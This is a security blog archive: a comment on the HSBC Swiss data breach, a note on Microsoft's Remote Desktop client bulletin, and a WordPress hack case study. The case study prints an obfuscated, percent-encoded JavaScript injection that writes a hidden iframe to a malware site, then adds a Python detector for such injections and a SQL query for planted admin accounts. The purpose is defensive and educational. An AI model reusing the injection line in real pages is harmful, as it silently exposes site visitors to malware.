Archive for the ‘Security’ Category
HSBC: data on 24,000 Swiss account holders stolen – Yahoo! News
Sorry I’ve not been around much posting and such. Dealing with some family “issues” and should have everything back to normal shortly!
That being said, I wanted to briefly comment on the article I read this morning about the HSBC Swiss Data breach.
According to the article:
A former IT employee of Swiss subsidiary HSBC Private Bank (Suisse) SA, identified by French authorities as Herve Falciani, stole the information between late 2006 and early 2007, the bank said.
My concern with this is that the breach took place in late 2006 and early 2007 and we’re just hearing about it now?
We should all be questioning what other data breaches – at other banks or companies – have taken place that affect us and our private data but that we haven’t heard about.
To me, that is more frightening than the breach itself!
via HSBC: data on 24,000 Swiss account holders stolen – Yahoo! News.
Critical: Vulnerabilities in Remote Desktop Connection Could Allow Remote Code Execution
Those of you who are my PC security (Introduction to PC Security) students disabled Remote Desktop on your PCs in the first few lessons of the course, so nobody can connect in to your machine; read on anyway, because this bulletin is about the client side as well.
However, many of you have not taken the course so I thought it was wise to post this.
Oh, and by the way, Mac users, this affects you too if you are using the Microsoft Remote Desktop Connection Client to connect a Mac to a Windows PC.
According to Microsoft’s Security Bulletin: MS09-044:
This security update resolves two privately reported vulnerabilities in Microsoft Remote Desktop Connection. The vulnerabilities could allow remote code execution if an attacker successfully convinced a user of Terminal Services to connect to a malicious RDP server or if a user visits a specially crafted Web site that exploits this vulnerability. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
There are also known issues after installing this update, so check the bulletin for the list of those. Note what the bulletin actually describes: the flaw is in the Remote Desktop Connection client, and the attack needs you to connect to a malicious RDP server or visit a crafted web page. Disabling the inbound Remote Desktop service on your own PC protects you from incoming connections, not from this, so install the update.
I’ve been teaching the Introduction to PC Security course for over 5 years and from day 1 I’ve had the students disable this service! I wonder what else you’re missing?
Follow-up on WordPress .htaccess Hack
In my last blog post, WP Blog Owners! Check Your .htaccess Files, I said I would follow-up with more details as they became available to me.
First, I would like to thank Sam McArthur of Forty First Internet Marketing Consultancy & SEO Specialists for allowing me to use her unfortunate WordPress hack as a case study for others.
I still do not know how the hacker accessed the .htaccess file. I have now downloaded the raw server logs from her web server to perform forensics on the traffic and what was accessed during the time of the hack.
During my investigation I was told about another interesting development: a second user of the same web hosting service had been hacked in a similar way.
So I started looking into a server vulnerability. I know I run the risk of a smart hacker working out which web host this is and attempting a future hack on other sites there, but that leads us to the issue of the web hosting company making sure they are protecting their users!
I’ve commented repeatedly about how secure LunarPages* is and how they do everything they can to protect their users. So, suffice it to say that this web site is not with LunarPages*. (Need I say more?)
That being said, as it turns out, it was not a server vulnerability. And I want to publicly say, “THANK YOU” to my partner and co-instructor, Anthony Valente, CEH, of Network Defense Solutions for finding what I missed!
I pored over the SQL database dump for over 48 hours (not consecutively) and compared WP files such as wp-config.php, and could not find anything except a strange block of encoded (base64-like) code that I could not isolate.
I searched online for other answers and read reports of hack after hack as to how they were being done and still could not find it.
I looked at individual plug-in file JPG files and upload JPG files to see if they were actually pictures or a spoofed file name containing actual code. Still nothing.
After more than 48 hours of research and Sam’s help with doing her own research, I finally threw my hands up in the air and sent what I knew to Anthony along with the files. It took him 5 minutes to isolate the code I had found!
Now, I’m going to share this with you. This hack was a JavaScript injection of the kind usually filed under Cross-site Scripting (XSS): a file that every page of the site loads had been altered to carry the attacker’s code.
The code resided in a plug-in called I Love Social Bookmarking, in the file wp-content/plugins/i-love-social-bookmarking/includes/ilsb.js.
The normal ilsb.js file should read:
// JavaScript Document
jQuery(document).ready(function()
{
    jQuery(".ilsb-parent").hover(
        function()
        {
            jQuery(".ilsb-child").show();
        },
        function()
        {
            jQuery(".ilsb-child").hide();
        }
    );
    jQuery(".ilsb-parent > a").click(function()
    {
        return false;
    });
});
The hacked code within Sam’s file read:
// JavaScript Document
document .write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%62%2D%62%75%72%65%61%75%2E%63%6F%6D%2F%74%65%6D%70%6C%61%74%65%73%2F%62%65%65%7A%2F%6D%65%6E%75%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
jQuery(document).ready(function()
{
    jQuery(".ilsb-parent").hover(
        function()
        {
            jQuery(".ilsb-child").show();
        },
        function()
        {
            jQuery(".ilsb-child").hide();
        }
    );
    jQuery(".ilsb-parent > a").click(function()
    {
        return false;
    });
});
The offending code is the document .write(unescape(...)) line, the one with all the percent signs (%). unescape() turns that string back into <iframe src="http://web-bureau.com/templates/beez/menu.php" width="0" height="0" frameborder="0"></iframe>.
That is a zero-by-zero, borderless (so invisible) iframe written at the top of every page that loads the plug-in’s script, and it pulls in a page from a third-party malware site. Because the URL only exists in percent-encoded form, a plain text search of the site for the domain name finds nothing; you have to decode the string to see where it points.
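Here is an added example (my code, not part of the original post or the plug-in) that does the decoding step for you: it scans a JavaScript file for the document.write(unescape('%..')) trick, decodes the payload the way a browser’s unescape() would, and reports any iframe it injects along with whether the iframe is sized to be invisible. The sample input is the altered ilsb.js reproduced from the post above; the function and variable names are mine.

```python
"""Scan JavaScript for obfuscated document.write(unescape('%..')) payloads.

Added example, not code from the post or the plug-in. Standard library only.
"""
import re

# Sample input: the altered ilsb.js reproduced from the post (the injected
# line plus the plug-in's original code).
HACKED_ILSB_JS = """// JavaScript Document
document .write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%62%2D%62%75%72%65%61%75%2E%63%6F%6D%2F%74%65%6D%70%6C%61%74%65%73%2F%62%65%65%7A%2F%6D%65%6E%75%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
jQuery(document).ready(function()
{
    jQuery(".ilsb-parent").hover(
        function() { jQuery(".ilsb-child").show(); },
        function() { jQuery(".ilsb-child").hide(); }
    );
    jQuery(".ilsb-parent > a").click(function() { return false; });
});
"""

# document.write(unescape("...")), tolerating stray whitespace such as the
# "document .write" seen in the hacked file.
WRITE_UNESCAPE = re.compile(
    r"""document\s*\.\s*write\s*\(\s*unescape\s*\(\s*(['"])(.*?)\1\s*\)\s*\)""",
    re.DOTALL)
PERCENT = re.compile(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})')
IFRAME = re.compile(r'<iframe\b([^>]*)>', re.IGNORECASE)
ATTR = re.compile(r'(\w+)\s*=\s*"([^"]*)"')


def js_unescape(s):
    """Decode like the browser's unescape(): %XX bytes and %uXXXX code units."""
    return PERCENT.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def find_injected_iframes(source):
    """Return one record per document.write(unescape(...)) call in `source`."""
    findings = []
    for m in WRITE_UNESCAPE.finditer(source):
        decoded = js_unescape(m.group(2))
        attrs = {}
        tag = IFRAME.search(decoded)
        if tag:
            attrs = dict(ATTR.findall(tag.group(1)))
        findings.append({
            # 1-based line number of the call, for locating it in the file
            'line': source.count('\n', 0, m.start()) + 1,
            'decoded': decoded,
            'src': attrs.get('src'),
            # a 0x0 iframe is meant to be invisible to the visitor
            'hidden': attrs.get('width') == '0' and attrs.get('height') == '0',
        })
    return findings


if __name__ == '__main__':
    for f in find_injected_iframes(HACKED_ILSB_JS):
        print(f"line {f['line']}: iframe src={f['src']} hidden={f['hidden']}")
        print('  decoded:', f['decoded'])
```

Run it over every .js file under wp-content (and over your theme’s .php files, since the same trick turns up inside inline script blocks) and anything it reports is worth a look; a legitimate plug-in has no reason to write a zero-size iframe into the page.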
Because of this, Sam was starting to get blacklisted on Google and Bing and her site was beginning to be blocked by software that uses Google malware detection and that included Firefox!
I am happy to report that Sam is off the blacklist and back to running her website as normal after I cleaned up the code and secured the site.
But here is your take-away from this experience: secure your WP blog!
- Remove the Admin account: log in and set up a new administrator account with a totally different name, and assign it administrator privileges.
- Log out and log back in under the new name.
- Delete the admin account and WordPress will ask you if you’d like to assign the posts to another user. Assign them to your new user name.
- Install the Bad Behavior plug-in and configure it properly. If you scroll down to the very bottom of this blog, you will see that it regularly blocks over 400 attempts to access this blog per week!
- Make sure you configure Akismet and get its API key.
- Delete your spam regularly! I have a theory about an attack vector but I’m not prepared to publish it yet and suffice it to say that I believe spam comments with links may be key in this method.
- Make sure that all users – if you allow them to register – are configured to be subscribers only!
- If you suspect foul play of any sort, search for a hidden user. To do that:
- Click on your Users section.
- Click on the link to the Administrators page.
- Right click on the page and choose: View Source.
- Look for the following code on that source page: tbody id="users". It should be toward the bottom. If you have 1 registered administrator, there should only be one name in that list. If you have 2, then there should only be two names, and so on.
- If you find one, you will have to delete this person out of your SQL database.
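The dashboard check above relies on the page the dashboard renders, which an attacker with database access can tamper with. An added example (my code, not from the post) that goes straight to the database instead: it lists every account whose wp_capabilities row grants the administrator role, compares that list with the administrators you know you created, and emits the DELETE statements for any account you did not. Assumptions, all mine: the default wp_ table prefix, and a small constructed copy of wp_users and wp_usermeta held in an in-memory SQLite database so the script runs offline; the query itself runs unchanged against the real MySQL database in phpMyAdmin or the mysql client.

```python
"""Find WordPress accounts holding the administrator role, hidden or not.

Added example, not code from the post. Assumes the default 'wp_' table
prefix; the sample rows below are constructed for the demonstration.
"""
import sqlite3

# WordPress stores roles as a PHP-serialized array in wp_usermeta; these are
# the exact strings it writes for a pure administrator and a pure subscriber.
ADMIN_CAPS = 'a:1:{s:13:"administrator";b:1;}'
SUBSCRIBER_CAPS = 'a:1:{s:10:"subscriber";b:1;}'

# The query to run against the real database (table prefix assumed: wp_).
FIND_ADMINS_SQL = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users AS u
JOIN wp_usermeta AS m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%administrator%'
ORDER BY u.ID
"""


def build_sample_db():
    """Constructed sample data: one real admin, one subscriber, one planted admin."""
    conn = sqlite3.connect(':memory:')
    conn.executescript("""
        CREATE TABLE wp_users (
            ID INTEGER PRIMARY KEY, user_login TEXT,
            user_email TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (
            umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
            meta_key TEXT, meta_value TEXT);
    """)
    users = [
        (2, 'sam_owner', 'sam@example.invalid', '2009-01-10 09:00:00'),
        (7, 'reader42', 'reader@example.invalid', '2009-11-02 18:30:00'),
        (13, 'wp_support', 'support@example.invalid', '2010-02-14 03:12:47'),
    ]
    meta = [
        (2, 'wp_capabilities', ADMIN_CAPS),
        (7, 'wp_capabilities', SUBSCRIBER_CAPS),
        (13, 'wp_capabilities', ADMIN_CAPS),   # the planted account
    ]
    conn.executemany('INSERT INTO wp_users VALUES (?,?,?,?)', users)
    conn.executemany(
        'INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?,?,?)',
        meta)
    conn.commit()
    return conn


def list_administrators(conn):
    """Every login that currently holds the administrator role, by user ID."""
    return [row[1] for row in conn.execute(FIND_ADMINS_SQL)]


def unexpected_administrators(conn, known_admins):
    """Admin logins you did not create: each one is a planted account to remove."""
    return sorted(set(list_administrators(conn)) - set(known_admins))


def removal_sql(user_id):
    """Statements that drop a planted account (reassign its posts first)."""
    user_id = int(user_id)
    return [
        f"DELETE FROM wp_usermeta WHERE user_id = {user_id};",
        f"DELETE FROM wp_users WHERE ID = {user_id};",
    ]


if __name__ == '__main__':
    db = build_sample_db()
    print('administrators:', list_administrators(db))
    print('unexpected    :', unexpected_administrators(db, ['sam_owner']))
    for login in unexpected_administrators(db, ['sam_owner']):
        (uid,) = db.execute(
            'SELECT ID FROM wp_users WHERE user_login = ?', (login,)).fetchone()
        print('\n'.join(removal_sql(uid)))
```

The query looks at wp_capabilities rather than the dashboard’s user list because the role is what matters: an account the attacker has renamed or hidden from the listing still has that row. Run the SELECT first and compare it with the administrators you know about; only then run the DELETEs, and reassign the account’s posts beforehand if it has any.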
I hope this is of service to you and again, a special thanks to Sam McArthur for allowing me to share her misfortune in the effort to educate others, and Anthony Valente, my partner and co-instructor for once again coming to my rescue!
TECHS: Please read: NOS Microsystems Adobe getPlus Helper ActiveX control contains stack buffer overflow Vulnerability Note, located here: https://www.kb.cert.org/vuls/id/773545
And, Adobe Acrobat and Reader contain a use-after-free vulnerability in the JavaScript Doc.media.newPlayer method Vulnerability Note, located here: https://www.kb.cert.org/vuls/id/508357
*TIIM: Truth in Internet Marketing – the LunarPages link is my affiliate link and I earn a $65 commission if you sign up using my link. However, that is NOT the reason I recommend them! I recommend them because they are GOOD, REASONABLY PRICED, and SECURE! It’s the host I use and I recommend all my clients use!